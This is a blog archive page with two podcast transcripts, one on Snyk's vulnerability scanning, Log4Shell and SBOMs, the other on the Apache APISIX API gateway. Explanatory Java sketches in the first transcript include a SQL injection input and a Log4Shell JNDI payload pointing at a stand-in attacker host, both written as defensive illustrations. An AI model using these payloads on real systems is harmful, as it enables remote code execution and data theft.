Cloud Security Archives | simplyblock
https://www.simplyblock.io/blog/tags/cloud-security/

Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk
https://www.simplyblock.io/blog/automated-vulnerability-detection-throughout-your-pipeline-with-brian-vermeer-from-snyk-video/
Fri, 10 May 2024

This interview is part of simplyblock's Cloud Commute Podcast, available on YouTube, Spotify, iTunes/Apple Podcasts, Pandora, Samsung Podcasts, and our show site.

In this installment of the podcast, we're joined by Brian Vermeer (Twitter/X, Personal Blog) from Snyk, a cybersecurity company providing tooling to detect common code issues and vulnerabilities throughout your development and deployment pipeline. He talks about the necessity of multiple checks, commonly found threats, and how important it is to rebuild images for every deployment, even if the code hasn't changed.

EP11: Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk

Chris Engelbert: Welcome back everyone. Welcome back to the next episode of simplyblock’s Cloud Commute podcast. Today I have yet another amazing guest with me, Brian from Snyk.

Brian Vermeer: That's always the question, right? How do you pronounce that name? Is it Snek, Snik, Synk? It's not Synk. It's actually Snyk. Some people pronounce it differently, but I don't like that. And the founder wants it to be Snyk. And it's actually an abbreviation.

Chris Engelbert: All right, well, we’ll get into that in a second.

Brian Vermeer: So now you know, I mean.

Chris Engelbert: Yeah, we’ll get back to that in a second. All right. So you’re working for Snyk. But maybe we can talk a little bit about you first, like who you are, where you come from. I mean, we know each other for a couple of years, but…

Brian Vermeer: It's always hard to talk about yourself, right? I'm Brian Vermeer. I live in the Netherlands, just an hour and a half south of Amsterdam. I work for Snyk as a developer advocate. I've been a long-term Java developer, mostly a backend developer, for all sorts of jobs within the Netherlands. I'm a Java Champion, very active in the community, specifically the Dutch community, so the Netherlands Java User Group and adjacent Java user groups, and I do some stuff in the Virtual Java User Group that we just relaunched. I try to be active, and I'm just a happy programmer.

Chris Engelbert: You’re just a happy programmer. Does that even exist?

Brian Vermeer: Apparently, I am the living example.

Chris Engelbert: All right, fair enough. So let’s get back to Snyk and the cool abbreviation. What is Snyk? What does it mean? What do you guys do?

Brian Vermeer: Well, what we do, first of all, we create security tooling for developers. So our mission is to make security an integrated thing within your development lifecycle. Like in most companies, it’s an afterthought. Like one security team trying to do a lot of things and we have something in the pipeline and that’s horrible because I don’t want to deal with that. If all tests are green, it’s fine. But what if we perceive it in such a way as, “Hey, catch it early from your local machine.” Just like you do with unit tests. Maybe that’s already a hard job creating unit tests, but hey, let’s say we’re all good at that. Why not perceive it in that way? If we can catch things early, we probably do not have to do a lot of rework if something comes up. So that’s why we create tooling for all stages of your software development lifecycle. And what I said, Snyk is an abbreviation. So now you know.

Chris Engelbert: So what does it mean? Or do you forget?

Brian Vermeer: So Now You Know.

Chris Engelbert: Oh!

Brian Vermeer: Literally. So now you know.

Chris Engelbert: Oh, that took a second.

Brian Vermeer: Yep. That takes a while for some people. Now, the thought behind it is that we started as a software composition analysis tool: people just bring in libraries, and they have no clue what they're bringing in and what kind of implications come with that. So we can do tests on that, we can make reports of that, and you can make the decisions. So now, at least, you know what you're getting into.

Chris Engelbert: Right. And I think with implications and stuff, you mean transitive dependencies. Yeah. Stuff like that.

Brian Vermeer: Yeah.
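To make the transitive part concrete, here is a toy sketch of how one declared dependency fans out into the full set you actually ship. The library names are invented for illustration; this is not how Snyk or any build tool actually resolves dependencies, just the underlying idea of walking the dependency graph:

```java
import java.util.*;

// A toy illustration of why transitive dependencies matter: you declare one
// library, but what you ship is the transitive closure of its dependency
// graph. (Library names are made up for the example.)
public class TransitiveDeps {
    static final Map<String, List<String>> GRAPH = Map.of(
        "my-app",        List.of("web-framework"),
        "web-framework", List.of("logging-lib", "json-lib"),
        "json-lib",      List.of("logging-lib"),
        "logging-lib",   List.of()
    );

    // Breadth-first walk collecting everything reachable from the root.
    static Set<String> resolve(String root) {
        Set<String> seen = new LinkedHashSet<>();
        Deque<String> queue = new ArrayDeque<>(List.of(root));
        while (!queue.isEmpty()) {
            String dep = queue.poll();
            for (String next : GRAPH.getOrDefault(dep, List.of())) {
                if (seen.add(next)) queue.add(next);
            }
        }
        return seen;
    }

    public static void main(String[] args) {
        // Declaring a single dependency pulls in three artifacts to audit.
        System.out.println(resolve("my-app"));
        // → [web-framework, logging-lib, json-lib]
    }
}
```

Each of those reachable artifacts is something a scanner has to check against known vulnerabilities, even though the developer only wrote one line in the build file.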

Chris Engelbert: Yeah. And I guess that just got worse with Docker and images and all that kind of stuff.

Brian Vermeer: I won't say it gets worse. I think we shifted the problem. I mean, we used to do this on bare metal machines as well, and these machines also had an operating system, right? So I'm not saying it's getting worse, but developers get more responsibility, because let's say we're doing DevOps, whatever that may mean. I mean, ask 10 DevOps engineers, that's nowadays a job, what DevOps is, and you'll probably get a lot of answers about tooling and such. But apparently what we did is tear down the wall between old-fashioned development and getting things to production, the ops folks. So we're now responsible as a team for all of that. And now your container, your environment, your cluster, your code, it's all together in your Git repository. So it's all code now, and the team creating it is responsible for it. So yes, it shifted the problem from being in separate teams to being all in one team that needs to create and maintain stuff. So I don't think we're getting into worse problems. I think we're shifting the problems, and it's getting easier to get into problems. That's what I mean, yeah.

Chris Engelbert: Yeah. Okay. We've broadened the scope of where you could potentially run into issues. So the way it works is that Snyk, I need to remember to say Snyk and not Synk, because now it makes sense.

Brian Vermeer: I'm okay with however you call it. As long as you don't say "sync," I'm fine. Then you're actually messing up letters.

Chris Engelbert: Yeah, sync is different. It's not awkward, and it's not Worcester. Anyway. So that means the tooling is actually looking into, I think, the dependencies, the build environment, whatever ends up in your Docker container or your container image, let's say, since nobody's using Docker anymore. And all those other things. So basically everything along the pipeline, the build pipeline, right?

Brian Vermeer: Yeah. You could say that. Actually, we start at the custom code that you're writing, so we're doing static analysis on that as well. We might combine that with stuff that we know from, let's say, all your dependencies that come in, your dependencies and transitive dependencies, like, "hey, you bring in a Spring Boot starter that has a ton of implications on how many libraries come in." Are these affected? Yes or no, et cetera, et cetera. Then we go one layer deeper, or around that: say, your container images. And let's say it's Docker, because it's still the most commonly used, but whatever, any image is built on a base image, and you probably streamed some binaries in there. So what's there? That's another shell around the whole application. And in the end you get into, for instance, the configuration for your infrastructure as code. That can go wrong by not having a security context, or some policies that aren't right, or something like that. Some pods that you gave more privileges than they should have because, hey, it works on my machine, right? Let's ship it. These kinds of things. So on all these four fronts, we try to provide tooling and test capabilities in such a way that you can choose how you want to utilize these test capabilities: either in a CI pipeline, or on your local machine, or in between, or as part of your build, whatever fits your needs. Instead of, "hey, this needs to be part of your build pipeline, because that's how the tool works." I was a developer myself, for backend jobs, for a long time. And I was the person that was like, if we need to satisfy that tool, I will find a way around it.

Chris Engelbert: Yeah, I hear you.

Brian Vermeer: Which defeats the purpose because, because at that point you’re only like checking boxes. So I think if these tools fit your way of working and implement your way of working, then you actually have an enabler instead of a wall that you bump into every time.

Chris Engelbert: Yeah. That makes a lot of sense. So that means when you say you start at the code level, simple things, like the still most common thing, SQL injection issues, all that kind of stuff, that is probably handled as well, right?

Brian Vermeer: Yeah. SQL injections, path traversal injections, cross-site scripting, all these kinds of things will get notified, and if possible, we will give you remediation advice on that. And then we go levels deeper. So you can almost say it's like four different types of scanners that you can use in whatever way you want. Some people are like, no, I'm only using the dependency analysis stuff. That's also fine. It's just four different capabilities for basically four levels in your application, because it's no longer just your binary that you put in. It's more than that, as we just discussed.
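As a concrete example of that first category, this is the kind of pattern a static analyzer flags. The table, column, and method names here are invented for illustration; with a real JDBC connection the safe variant would be a PreparedStatement:

```java
// Sketch (hypothetical names): why string-concatenated SQL is flagged,
// and what the parameterized alternative looks like.
public class SqlInjectionSketch {
    // Vulnerable: user input is pasted straight into the query text,
    // so input can change the query's structure, not just its data.
    static String vulnerableQuery(String userName) {
        return "SELECT * FROM users WHERE name = '" + userName + "'";
    }

    // Safer: a placeholder keeps data out of the SQL grammar. With JDBC
    // this would be:
    //   PreparedStatement ps = conn.prepareStatement(
    //       "SELECT * FROM users WHERE name = ?");
    //   ps.setString(1, userName);
    static String parameterizedQuery() {
        return "SELECT * FROM users WHERE name = ?";
    }

    public static void main(String[] args) {
        String attack = "' OR '1'='1";
        System.out.println(vulnerableQuery(attack));
        // The injected clause changes the query's meaning:
        // SELECT * FROM users WHERE name = '' OR '1'='1'
    }
}
```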

Chris Engelbert: So, when we look at the recent and not-so-recent past, I mean, we're both coming from the Java world. You said you were a Java programmer for a long time. I am. I think the Java world isn't necessarily known for massive CVEs. Except Log4Shell.

Brian Vermeer: Yeah, that was a big one.

Chris Engelbert: Right? Yeah.

Brian Vermeer: The thing, I think, is that in the Java world it's either not so big or very big. There's no in-between, or at least it doesn't get the same amount of attention. But yeah, Log4Shell was a big one. First of all, props to the folks that maintain that, because I think there were only three active maintainers at the point when the thing came out, and it's a small library that is used and consumed by a lot of bigger frameworks. So everybody was looking at them as if they were doing a bad job, and it was just three guys that maintained it voluntarily.

Chris Engelbert: So, for the people that do not know what Log4Shell was: Log4j is one of the most common logging frameworks in Java. And there was a way to inject remote code and execute it with basically whatever permission your process had. And as you said, a lot of people love to run their containers with root privileges. So there's your problem right there. But yeah, Log4Shell was, I think, at least from what I can remember, probably the biggest CVE in the Java world, ever since I joined.
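To illustrate the mechanism with a toy model, not the real Log4j code: Log4j 2.x expanded `${...}` lookups found anywhere in a formatted log message, including attacker-controlled input, so a crafted header or form field could trigger a JNDI lookup to an attacker's server. The class below only detects the pattern; the vulnerable library would actually resolve the lookup and could end up loading remote code:

```java
import java.util.regex.Pattern;

// Toy model of the Log4Shell (CVE-2021-44228) injection point. Real Log4j
// would *resolve* a jndi: lookup found in the message; here we only detect
// that attacker-controlled input would have triggered one.
public class LookupSketch {
    static final Pattern LOOKUP = Pattern.compile("\\$\\{jndi:[^}]*\\}");

    static boolean containsJndiLookup(String message) {
        return LOOKUP.matcher(message).find();
    }

    public static void main(String[] args) {
        // Hypothetical payload shape: user input logged verbatim.
        String userInput = "${jndi:ldap://attacker.example/a}";
        System.out.println(containsJndiLookup("User-Agent: " + userInput)); // true
        System.out.println(containsJndiLookup("a harmless log line"));      // false
    }
}
```

The point of the sketch: the vulnerability lived in how logged *data* was interpreted, which is why simply logging untrusted input was enough to be exposed.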

Brian Vermeer: Maybe that one, but in 2017 we had the Apache Struts one that blew away our friendly neighborhood Equifax. But yeah.

Chris Engelbert: I'm not talking about Struts, because that was so long deprecated by that point in time. It was… they deserved it. No, but seriously, yeah. True, true. The Struts one was also pretty big. But since we are recording this on April 3rd, there was a very, very interesting thing just two or three days ago, like April 1st. I think it was actually April 1st, because I initially thought it was an April Fools' joke, but it was unfortunately not.

Brian Vermeer: I think it was the last day of March though. So it was not.

Chris Engelbert: Maybe I just saw it on April 1st. To be honest, initially I thought, okay, that's a really bad April Fools' joke. So what we're talking about is the XZ issue. Maybe you want to say a few words about that?

Brian Vermeer: Well, let's keep it simple. The XZ issue is basically an issue in one of the tools that comes with some Linux distributions. And long story short, I'm not sure if they already created exploits for it. I didn't actually try it, because we've got folks doing the research. But apparently, because of that tool, you could do nasty stuff such as arbitrary code execution, or things with getting into secure connections. And it comes with your operating system. So that means if you have a Docker image, or whatever image, and you're based on a certain well-known Linux distribution, you might be infected, regardless of whatever your application does. And it's a big one. If you want to go deeper, there are tons of blogs by people that can explain what the actual problem was. But I think for general developers: don't shut your eyes and say "it's not on my machine." It might be in your container, because you're using a now-outdated image.

Chris Engelbert: I think there are two things. First of all, I think it was found before it actually made it into any distribution, which is good. So if you're not using any of the self-built distributions, you're probably good. But what I found more interesting is that this backdoor was introduced by a person that had been working on the tool for quite a while, like over a year or so, basically gaining the trust of the actual maintainers and eventually sneaking stuff in. And that is why I think tools like Snyk, or, let's be blunt, some of the competitors, are so important. Because it's really hard to just follow all of the new CVEs, and sometimes they're not blowing up this big, so you probably don't even hear about them. For that reason, it's really important to have those tools.

Brian Vermeer: I totally agree. I mean, as a development team, it is a side effect for you. You're building stuff, and you don't focus on manually checking whatever is coming in and whether it's vulnerable or not. But you should be aware of these kinds of things, so if they come in, you can make appropriate choices. I'm not saying you have to fix it. That's up to you, your threat level, and whatever is going on in your company. But you need to be able to make these decisions based on accurate knowledge, and have the appropriate knowledge so you can actually make such a decision. And yeah, you don't want to manually hunt these things down. You want to be actively pinged when something happens to your application that might have implications for your security risk.

Chris Engelbert: Right. And from your own feeling: in the past, we mostly deployed on-prem installations or in private clouds, but with the shift to public cloud, do we increase the risk factor? Do we increase the attack surface?

Brian Vermeer: Yes. I think the short answer is yes. There are more things that we have under our control as a development team, and we do not always have the necessary specialties within the team. So we're doing the best we can, but that means we've got multiple attack surfaces. Your connection to your application is one thing, but another is that if I can get into your container for some reason, I can use that. Even though some things in containers or operating systems might not be directly exploitable, they can be part of a chain that causes a problem. So if there's one hole, I could get in and use certain objects or certain binaries in my chain of attacks and make it a domino effect, basically. So you're giving people more and more ammunition. And as we automate certain things, we do not always have the necessary knowledge about them, so certain things might become bigger and bigger. Plus there's the fast pace we're currently moving at. Like, tell me, 10 years ago, how were you deploying?

Chris Engelbert: I don’t know. I don’t remember. I don’t remember yesterday.

Brian Vermeer: Yeah. But I mean, probably not three times a day. 10 years ago we were probably deploying once a month, and you had time to test, or something like that. So it's a combination of doing it all within one team, which, yes, we should do, but also the fast pace at which we need to release nowadays. The whole continuous development and continuous deployment thing is part of this. If you're actually doing that, of course.

Chris Engelbert: Yeah, that's true. I think it would have been about every two weeks or so. But yeah, you normally had one week of development, one week of bug fixing and testing, and then you deployed it. Now you do something, you think it's ready, it runs through the pipeline, and in the best case, it gets deployed immediately. And if something breaks, you're going to fix it. Or, in the worst case, you roll back if it's really bad.

Brian Vermeer: But on the other hand, say you're an application developer and you need to ship that stuff in a container. Do you touch your container, or rebuild your container, if your application didn't change?

Chris Engelbert: Yes.

Brian Vermeer: Probably a lot of folks won't, because, hey, some things didn't change. But the image you base your stuff upon, your base image or however you manage that, which can be company-wide, or something you just pull out of Docker Hub or wherever, that's another layer that might have changed, might have been fixed, or might have had vulnerabilities found in it. So it's no longer "hey, I didn't touch that application, so I don't have to rebuild." Yes, you should, because other layers in that whole application changed.
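One way to see why a rebuild matters even with unchanged code: the base layer is something you don't control. A minimal sketch (image name, tag, and paths are illustrative):

```dockerfile
# The base image is a layer you don't control; rebuilding picks up whatever
# fixes were published for this tag since your last build.
FROM eclipse-temurin:21-jre

# Application layer: your code may be unchanged, but the layers *below* it
# moved, so the resulting image is different (and hopefully patched).
COPY target/app.jar /opt/app/app.jar
CMD ["java", "-jar", "/opt/app/app.jar"]
```

The trade-off: pinning the base image by digest makes builds reproducible, but then you only get security fixes when you explicitly bump the digest, which is exactly the kind of thing automated scanning is meant to remind you about.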

Chris Engelbert: Right, right. And I think you brought up another important factor. It might be that meanwhile, between the last deployment and now, a CVE has been found, or something else, right? So you want to make sure you test it again. And then you have other programming languages, I'm not naming things here, but you might get a different version of a dependency, slightly newer, when you're doing a fresh install, right? And all of that… there are so many different things. Applications these days, even microservices, are so complex, because they normally need so many different dependencies, and it is hard to keep an eye on that. And that kind of brings me to the next question: how does Snyk play into something like an SBOM, the software bill of materials?

Brian Vermeer: Getting into the hype train of SBOMs. Now, it's not just a hype train. I mean, it's a serious thing. For folks that don't know, you can compare an SBOM to the ingredients and nutrition list for whatever you're trying to consume. You have no clue what's in there; the nutrition facts on the package should say what's in it, right? That's how you should perceive an SBOM. If you create an artifact, then you should create a suitable SBOM with it that basically says, "okay, I'm using these dependencies and these transitive dependencies, and maybe even these Docker containers or whatever. I'm using these things to create my artifact." And a consumer of that artifact is then able to search within that. Say a CVE comes up, a new Log4Shell, let's make it big. "Am I affected?" That's the first question a consumer, or somebody that uses your artifact, asks. And with an SBOM you have a standardized, well, there are three standards, but nevertheless a standardized way of having that, and of making it at least machine-searchable, to see whether you are vulnerable or not. So how do we play into that? Yes, you can use our Snyk tooling to create SBOMs for your applications or for your containers. That's possible. And we have the capabilities to read SBOMs in, to see if those SBOMs contain packages or artifacts that have known vulnerabilities, so you can, again, take the appropriate measures. I think SBOMs are great from the consumer side. It's very clear what the stuff that I got from the internet, or got from a supplier, because we're talking about supply chains all the time, is built upon, so I can see whether it contains problems, or potential problems when something new comes up. And yes, we have capabilities for creating these SBOMs and scanning these SBOMs.
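For a sense of what such a document looks like, here is a heavily trimmed CycloneDX-style fragment (one of the SBOM standards mentioned above; the component shown is the famously vulnerable Log4j version, and real SBOMs carry many more fields):

```json
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "components": [
    {
      "type": "library",
      "name": "log4j-core",
      "version": "2.14.1",
      "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"
    }
  ]
}
```

The `purl` (package URL) is what makes the document machine-searchable: a scanner matching that identifier against a vulnerability database can answer "am I affected by Log4Shell?" without ever inspecting the artifact itself.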

Chris Engelbert: All right. We're basically out of time, but there's one more question I still want to ask: where do you personally see the biggest trend, related to Snyk, or to security in general?

Brian Vermeer: The biggest trend is the AI hype nowadays. And that is definitely a thing. What people think is that AI is a suitable replacement for a security engineer. Yeah, I exaggerate now, but it's not, because we have demos where we let a code assistant tool, a well-known code assistant tool, spit out vulnerable code, for instance. So I think the trend is two things. The whole software supply chain, whatever you bring in, you should look at, that's one thing. But the other is that if people are using AI, they shouldn't trust it blindly. And I think that goes for everything, both stuff in your supply chain and code generated by a code assistant. You should know what you're doing. It's a great tool, but don't trust it blindly, because it can also hallucinate and bring in stuff that you didn't expect if you are not aware of what you're doing.

Chris Engelbert: So yeah. I think that is a perfect closing. It can hallucinate things.

Brian Vermeer: Oh, definitely, definitely. It's a lot of fun to play with, and it's also a great tool. But you should know that, first of all, it doesn't replace developers that think. Thinking is still something an AI doesn't do.

Chris Engelbert: All right. Thank you very much. Time is over. 20 minutes is always super, super short, but it’s supposed to be that way. So Brian, thank you very much for being here. I hope that was not only interesting to me. I actually learned quite a few new things about Snyk because I haven’t looked into it for a couple of years now. So yeah, thank you very much. And for the audience, I hope you’re listening next week. New guest, new show episode, and we’re going to see you again.

Improve Security with API Gateways, Nicolas Fränkel
https://www.simplyblock.io/blog/how-api-gateways-help-to-improve-your-security-with-nicolas-frankel-from-api7-ai-video/
Fri, 19 Apr 2024

In this installment of the podcast, we talk to Nicolas Fränkel (X/Twitter) from API7.ai, the company behind Apache APISIX, a high-performance open-source API gateway. He discusses the significance of choosing tools that fit your needs, and emphasizes making choices based on what works best for your requirements.

This interview is part of the simplyblock Cloud Commute Podcast, available on YouTube, Spotify, iTunes/Apple Podcasts, Pandora, Samsung Podcasts, and our show site.


Chris Engelbert: Hello, everyone. Welcome back to the next episode of simplyblock's Cloud Commute podcast, your weekly 20-minute podcast show about cloud, cloud security, cloud storage, and Kubernetes. Today I have Nicolas with me, Nicolas Fränkel. I think it's a German last name, right?

Nicolas Fränkel: It's a German last name. I'm French, and it's mostly spoken by English speakers, so I don't care anymore.

Chris Engelbert: All right, fair enough. You can jump right into that. Tell us a little bit about you, where you’re from, why you have a German last name, and being French, and everything else.

Nicolas Fränkel: I'm Nicolas Fränkel. Yeah, I'm French, I was born in France. For a long time I was a consultant in different roles: developer, architect, cloud architect, solution architect, whatever. I worked on projects with crazy deadlines, sometimes stupid management, changing requirements, and stuff like that. I got very dissatisfied with it, and for a couple of years now I've been doing developer advocacy.

Chris Engelbert: Right, right. And we know each other from the Java world, so you’ve been a lot around the Java community for a long, long while.

Nicolas Fränkel: Yeah, I think we first met at conferences. I don’t remember which one, because it was quite long ago, but my main focus at the time was Java and the JVM.

Chris Engelbert: I think the first time was actually still at JavaOne or something. So people that know a little bit of the Java space and remember JavaOne can guess how long ago this must have been. Right, so right now you're working for a company called API7.

Nicolas Fränkel: So API7 is the company that is working on Apache APISIX. Yeah, I agree, that's funny. It was probably named by engineers with no marketing involved, but it's still good, because 7 is better than 6, right? So Apache APISIX is an API gateway, and it's an Apache project, obviously.

Chris Engelbert: All right, so you mentioned APISIX, and you obviously have the merch on you. So API7 is like the Python version, right? It’s one-based. APISIX is the zero-based version. We can argue which one is better.

Nicolas Fränkel: It's a bit more complicated. So API7 is the company. APISIX is the Apache project, but API7 also has an offering called API7. So either you have an API7 on-premise version or an API7 cloud version. You can think about it just like Confluent and Kafka. Of course, again, API7, APISIX, it's a bit confusing, but just forget about the numbering. It's just like Confluent and Kafka: Confluent contributes to Kafka, but they still have their own offering. They do support for their own products, and they also have on-premise and cloud versions.

Chris Engelbert: All right, so that means that API7 as a company basically has probably the majority of engineers working on APISIX, which itself is a project in the Apache Foundation, right?

Nicolas Fränkel: I wouldn't say they have the majority. To be honest, I didn't check. But regarding the Apache Foundation: in order for a project to be promoted to top level, you must uphold a certain number of conditions. The process goes like this: you go to the Apache Foundation, you donate the project, and then you become part of the incubator. And in order to be promoted, you need to, as I mentioned, uphold a certain number of conditions, which I didn't check in detail. But one of them is that you must have enough committers from different companies, so that one company is not the only driving force behind the product, which in my opinion is a good thing. Whereas in the CNCF, a project is managed by a company or different companies, in the Apache Foundation the granularity is the contributor. A contributor can afterwards change company, of course. But in order to actually graduate from the incubator, you must have a certain number of people from different companies.

Chris Engelbert: Yeah, Ok. That makes sense. It’s supposed to be more of a community thing. I think that is the big thing with the Apache Foundation.

Nicolas Fränkel: That’s the whole point.

Chris Engelbert: Also, I think also in comparison or in difference from the Eclipse Foundation, where a lot of the projects are basically company driven.

Nicolas Fränkel: I don't know about Eclipse. I know about the CNCF. I heard that in order to give your project to the CNCF, you need to pay them money, which is a bit weird. Again, I didn't fact-check that. But it's company-driven. You talk to companies, the CNCF talks to companies, whereas the Apache Foundation talks to people.

Chris Engelbert: Yeah, OK. Fair enough. All right. Let's see. You said it's an API gateway. So for the people that have not used an API gateway and have no idea what that means, and I think APISIX is a little bit more than just a standard gateway, maybe you can elaborate a little bit?

Nicolas Fränkel: You can think about an API gateway as a reverse proxy on steroids that allows you to do stuff that is focused on APIs. I always use the same example of rate limiting. Rate limiting has been a feature of any reverse proxy since the '80s, because you want to protect your information system from distributed denial-of-service attacks. The thing is, it works very well, but you treat every one of your clients the same; you rate limit them exactly the same. Now imagine you are providing APIs. There is a huge chance that you will want to have some offerings, so that a couple of customers can get a higher limit than others. You could probably do that in a reverse proxy, but you would need to add business logic into the reverse proxy. And as I mentioned, reverse proxies were designed at a time when they were purely technical components. They don't like business logic so much. Nothing would prevent you from creating a C module, putting it in NGINX, and doing that. But then you encounter a couple of issues.

The first one is the open source version of NGINX: if you need to change the configuration, you need to switch it off and on again. If it sits at the entrance of your information system, that's not great. And the business logic might change every now and then, probably quite often, which is also not great. That's why those technical components, in general, are not happy about business logic; you want to move the business logic away from those components. API gateways, in my definition, because you will find plenty of definitions, first allow you to change the configuration dynamically. You don't need to switch them off and on again. And although you still don't want to have too much business logic in there, they are not unfriendly to business logic, meaning you can, for example in Apache APISIX, create your plugin in Lua, and then you can change the Lua code. And then it's fine.
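The per-client rate limiting idea described above can be sketched in a few lines. This is illustrative only: Apache APISIX implements this kind of policy in its rate-limiting plugins, not with code like this, and the class, method, and client names are invented:

```java
import java.util.HashMap;
import java.util.Map;

// Sketch of gateway-side rate limiting with a *different* quota per client
// (a fixed-window counter), rather than one global rule for everybody.
public class PerClientRateLimiter {
    private final Map<String, Integer> quota = new HashMap<>(); // allowed per window
    private final Map<String, Integer> used  = new HashMap<>(); // seen this window

    public void setQuota(String clientId, int requestsPerWindow) {
        quota.put(clientId, requestsPerWindow);
    }

    public boolean allow(String clientId) {
        int limit = quota.getOrDefault(clientId, 10); // default tier
        int seen = used.merge(clientId, 1, Integer::sum);
        return seen <= limit;
    }

    // Would be called once per time window (e.g. every minute).
    public void resetWindow() { used.clear(); }

    public static void main(String[] args) {
        PerClientRateLimiter limiter = new PerClientRateLimiter();
        limiter.setQuota("premium-customer", 3);
        limiter.setQuota("free-customer", 1);
        System.out.println(limiter.allow("free-customer")); // true
        System.out.println(limiter.allow("free-customer")); // false: over quota
    }
}
```

The business-logic part is exactly the `quota` map: which customer gets which tier. That is the piece that changes often and that you don't want compiled into a C module inside NGINX.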

Chris Engelbert: Right. OK, so APISIX also uses Lua. That seems to be pretty much a staple among a lot of the implementations.

Nicolas Fränkel: Not really. I mean, regarding the architecture, it's based on NGINX. But as I mentioned, NGINX is not great for that, so on top of that you have something called OpenResty. OpenResty is actually Lua code that allows you to change the configuration of NGINX dynamically. The thing is, the configuration of OpenResty itself maps only one-to-one to the configuration of NGINX. So if you are doing it at scale, it's not the best maintainability ever. So Apache APISIX provides you with abstractions. What is an upstream? What is a route? Then you can reuse an upstream across several routes. What is a service? And everything is plugin-based, so it's easy for routes to add a plugin, remove a plugin, change the configuration of a plugin, and so on and so forth.
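As a sketch of those abstractions, a route pointing at an upstream with one plugin attached might look roughly like this in the APISIX admin configuration. The JSON shape is from memory of the APISIX docs; treat the exact field names, values, and the backend address as illustrative rather than authoritative:

```json
{
  "uri": "/orders/*",
  "upstream": {
    "type": "roundrobin",
    "nodes": { "10.0.0.5:8080": 1 }
  },
  "plugins": {
    "limit-count": {
      "count": 100,
      "time_window": 60
    }
  }
}
```

The route and upstream are the reusable building blocks; the `plugins` object is where cross-cutting behavior like rate limiting or authentication gets attached and reconfigured dynamically, without restarting the gateway.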

Chris Engelbert: Right. Ok, so from an application developer's perspective, do I need to be aware of that? Or does that all happen transparently to me?

Nicolas Fränkel: That's the thing. It's an infrastructure component, so normally you shouldn't care about it. You mostly don't care about it. Even better, a lot of stuff that you would do with frameworks or libraries like Spring, you can remove from every individual app that you create and put in this entry point, at one very specific place. Your applications themselves don't need to protect against DDoS attacks because the API gateway will do it for them. And you can also have authentication, authorization, caching, whatever. You can move most of those features away from your app, focus on your business logic, and just use the plugins that you need.

Chris Engelbert: Right, so you mentioned authentication. So I assume it will hand me a JWT token or that kind of thing?

Nicolas Fränkel: For that we have multiple plugins. So yes, we have a JWT token plugin. We have a Keycloak integration with a plugin. We have OpenID Connect. We have lots and lots of plugins. And since it's plugin-based, nothing prevents you from creating your own plugin, either to interface with one of your own proprietary authentication systems or, if there is something you want that is still generic, you can always contribute it back to the Apache Foundation, and then it becomes part of the product. And I mean, that's the beauty of open source.
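As a hedged sketch, enabling token-based authentication on a route comes down to adding the plugin to that route's configuration. The route and upstream below are invented, and the consumer object carrying the JWT key is omitted for brevity:

```yaml
# Illustrative route: requests without a valid JWT are rejected
# before they ever reach the application.
routes:
  - uri: /protected/*
    upstream_id: 1
    plugins:
      jwt-auth: {}          # validate the JWT presented by the client
      limit-count:          # and rate limit the requests that pass
        count: 100
        time_window: 60
```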

Chris Engelbert: Yeah, I agree. And I mean, we've known each other for a long time. You know that I'm a big fan of open source for exactly all those reasons. Also from a company perspective, like a backing company, in this case API7, I think it makes a lot of sense. Because you get, I don't want to say free help, but you get people who love your project, your product, and who are willing and happy to contribute as well.

Nicolas Fränkel: Exactly. I mean, we both worked for Hazelcast, although at different periods, and that was open source. But for me, this is the next step. The product is not only open source; and open source is at a very interesting moment right now, because some companies are afraid that their product will be shrink-wrapped by a cloud provider, so they switch to a license which is not truly open source according to the credo. But the Apache Foundation is fully open source. So even if, for whatever reason, API7 decides not to work on the project anymore, the project is still there. And if you find a couple of maintainers, it means it's still maintained.

Chris Engelbert: So from a deployment perspective, I guess I deploy that into Kubernetes, or?

Nicolas Fränkel: That's the thing. It's not focused on Kubernetes, so you can deploy it on any cloud provider, or even directly on the machines you choose. You have basically two modes. The first mode is the one you would like to play with at first. You deploy your nodes, and then you deploy etcd, the same key-value distributed store used by Kubernetes to hold its configuration. Then you can change the configuration of APISIX through an API call, and it will store that configuration in etcd. That's very dynamic. If you have more maturity in GitOps, or in DevOps in general, perhaps you will notice: now, where is my configuration? Well, in etcd. But now I need to back it up. How do I migrate? I need to move the data from etcd to another cluster. So it's perhaps not the best production-grade way. The other way is to have everything static in YAML files. I hate YAML.

But at the moment, everybody is using YAML, and that's the configuration; at least Ops understand how to operate it. So every node has its own set of YAML files, and those YAML files are synchronized via GitOps to a GitHub repository. And then the GitHub repository is the source of truth, and it can be read, it can be audited, it can be whatever. Whereas if you store everything in etcd, it still works the same way, but it's opaque. You don't know what happens, right?
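For reference, the switch between the two modes lives in APISIX's own configuration file. This is a sketch assuming APISIX 3.x conventions, where standalone mode reads routes from a local `apisix.yaml` instead of etcd:

```yaml
# conf/config.yaml: run APISIX without etcd, reading its routes
# from a local apisix.yaml that can be versioned in Git.
deployment:
  role: data_plane
  role_data_plane:
    config_provider: yaml
```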

Chris Engelbert: I mean, the last thing you said, with the GitHub repository basically being the infrastructure-as-code source of truth, that would probably then play into something like ArgoCD to deploy the updated version.

Nicolas Fränkel: Right, that makes sense. We don't enforce any product. We just provide a way to statically configure Apache APISIX, and then you use whatever tool you want. We are not partisan. We just allow you to do it.

Chris Engelbert: So from your own feeling, what do you think is the most common use case for API gateways? Is it, as you said, rate limiting? I can see that as a very common thing, not only for companies like X or Twitter, or whatever you want to call them these days, but also GitHub. I think every meaningful API has some kind of rate limit. But I could also see DDoS protection, where I think people would probably use Cloudflare or one of those providers. What do you think is the biggest typical use case?

Nicolas Fränkel: If you are using APIs, you probably need something more than just a traditional reverse proxy. If you are using a reverse proxy and you are happy with it, you didn't hit any of its limits, just keep using your reverse proxy. But as I mentioned, once you start to dip your feet into the API world, you will notice the reverse proxy's limits. It has some of the features that you want, but perhaps not the ease or the flexibility of configuration that you want. Say you want to treat different clients in different ways. That's probably the time when you need to think about migrating to an API gateway.

But contexts are so different that it's very hard to provide a simple solution that caters to everybody's needs. You could have a reverse proxy at the entrance of your whole information system, and at the second level you would have the API gateway. Or you could have an API gateway for each domain of your organization, because your organization has different teams for every domain. And though it would be possible to have one gateway that is managed by different teams, it makes a lot of sense to have each team manage its own configuration on its own component. It's like with microservices: everybody manages their own stuff, and you are sure that nobody will step on each other's toes. But again, it depends a lot on the size, on how well you're organized, on the maturity, on many different things. There are probably as many architectures as there are organizations.

